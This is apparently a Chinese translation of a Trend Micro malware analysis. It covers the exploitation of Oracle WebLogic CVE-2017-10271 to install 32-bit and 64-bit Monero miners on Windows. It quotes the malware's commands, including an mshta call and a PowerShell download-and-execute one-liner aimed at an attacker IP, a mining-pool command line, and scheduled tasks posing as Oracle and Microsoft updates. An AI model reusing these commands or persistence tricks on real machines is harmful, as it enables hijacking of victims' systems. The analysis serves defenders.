加密货币的突然崛起引发了被捕获目标的转变,网络犯罪分子开始调整和使用他们的资源来尝试获得加密货币,无论是通过追踪像比特币钱包这样的存储库还是通过破解网络设备来挖掘货币。这不是新消息,勒索软件作者多年来一直将比特币作为他们的首选货币。但最近,我们在2017年10月下旬看到了加密货币挖矿程序的例子,当时移动恶意软件挖矿程序出现在流行的应用程序商店中,并且在2017年12月时,Digmine加密货币挖矿程序正在通过社交媒体消息应用程序进行传播。
现在,滥用CVE-2017-10271(一种允许远程执行代码的修补Oracle WebLogic WLS-WSAT漏洞)将被用以提供两种不同的加密货币挖矿程序:XMRig Monero挖矿程序的64位变体和32位变体。如果一个版本与被感染的Windows计算机不兼容,则另一个版本将运行。图1显示了该漏洞的代码仍在开发中。本报告分析了最新版本。
图1.代码的旧版本(右侧)和新版本(左侧)与新组件(红色框)的比较
利用挖矿程序
在撰写本文时,我们看到CVE-2017-10271正在被利用,趋势科技将检测到的漏洞称为Coinminer_MALXMR.JL-PS。 当成功执行时,它可以让感染的机器与挖矿程序在一起。
图2.漏洞攻击的负载看起来可能如何(执行Coinminer_MALXMR.JL-PS)
一旦执行了Coinminer_MALXMR.JL-PS,它将下载三个文件到机器中:其挖掘组件javaupd.exe(检测为Coinminer_TOOLXMR.JL-WIN64),其自动启动组件startup.cmd(检测为Coinminer_MALXMR.JL-BAT )以及另一个恶意文件3.exe(检测为Coinminer_MALXMR.JLT-WIN32)。
我们对最新挖矿程序的分析表明,Windows操作系统的体系结构在决定哪个硬币挖矿程序将运行时扮演着重要角色。 第一台Monero 挖矿程序是64位版本,将在相应的64位Windows设备上执行。 但是,如果设备运行32位Windows版本,则第二个挖矿程序将运行。
更多的设备会受到多个挖矿程序版本的影响
该过程从机器上安装自动启动组件开始。 在撰写本文时,恶意软件通过将startup.cmd复制到Startup文件夹来完成此操作。 .cmd文件在系统启动时打开,然后执行mshta hxxp://107.181.174.248/web/p.hta,然后执行Powershell命令:
cmd /c powershell.exe -NoProfile -InputFormat None -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString(‘hxxp://107.181.174.248/web/check.ps1’))
恶意软件创建两个不同的计划任务:
第一项任务试图下载该矿工并一次又一次地执行。 Mshta hxxp://107.181.174.248/web/p.hta将运行并按名称“Oracle Java更新”计划。它每80分钟执行一次,其进程与startup.cmd文件相同。
另一个计划任务名为“Oracle Java”。它每天执行并终止第一个挖掘组件。 它继续执行以下命令:
“cmd / c taskkill / im powershell.exe / f”
“cmd / c taskkill / im javaupd.exe / f”
“cmd / c taskkill / im msta.exe / f”(我们怀疑这对开发者来说是一个错误,应该是mshta.exe。)
创建这些计划任务后,Coinminer_MALXMR.JL-PS将执行其挖矿程序组件javaupd.exe,从而允许挖掘过程启动。 它使用以下命令:
cmd.exe /c C:ProgramDatajavaupd.exe -o eu.minerpool.pw:65333 -u {Computer Name}
挖矿可能会减慢系统并影响性能。
第二个有效负载,即下载的3.exe文件,将检查系统是否正在运行32位或64位平台。 基于操作系统体系结构,它将下载并执行一个新文件LogonUI.exe(检测为COINMINER_MALXMR.JL-WIN32)。 如果第一个64位挖矿程序采集器组件未运行,LogonUI.exe将下载一个.DLL文件(检测为COINMINER_MALXMR.FD-WIN32),然后该文件将下载并执行第二个挖矿程序组件sqlservr.exe(检测为COINMINER_TOOLXMR。JL-WIN32)。
第二个组件与32位Windows平台兼容,将运行而不是第一个。 它还能够自动启动并创建一个计划任务,使其能够每天自动执行:
1. LogonUI已注册为服务
2. 该服务被命名为“Microsoft遥测”
3. 创建每天执行“Microsoft Telemetry”的计划任务
图3.挖矿程序的有效负载执行链
挖矿程序恶意软件试图尽可能多地感染设备,因为它需要大量的计算能力来大量挖掘任何加密货币。 有了两个挖矿程序系统,这两个系统都能够自动和每天启动,这种特定攻击的恶意软件开发人员有更多机会感染机器并将其用于密码设置。
这个特殊的挖矿程序也希望通过关闭其他恶意软件来充分利用它感染的机器。 它实际上终止了spoosvc.exe并删除了计划任务“Spooler SubSystem Service”,这是另一个挖矿程序被检测为TROJ_DLOADR.AUSUHI的已知行为。
对用户的影响和可能的对策
该恶意软件使用系统的中央处理单元(CPU)和/或机器的图形处理单元(GPU)资源,使系统运行异常缓慢。起初,由于影响可能是由其他因素造成的,用户可能不会将问题归因于妥协。但是,正如我们所提到的,挖矿程序自2017年年中以来一直在增加,用户应该期望更多旨在劫持他们的系统资源的恶意软件变种。网络犯罪分子正在抓住每一个机会,尝试新的方式向用户提供挖掘恶意软件。
定期修补和更新软件可以缓解加密货币恶意软件和利用系统漏洞的其他威胁(上述漏洞已于2017年10月进行了修补)的影响。 IT /系统管理员和信息安全专业人员也可以考虑应用程序白名单或类似的安全机制,以防止可疑的可执行文件运行或安装。主动监控网络流量有助于更好地识别可能表明恶意软件感染。
参考链接:
https://blog.trendmicro.com/trendlabs-security-intelligence/oracle-server-vulnerability-exploited-deliver-double-monero-miner-payloads/
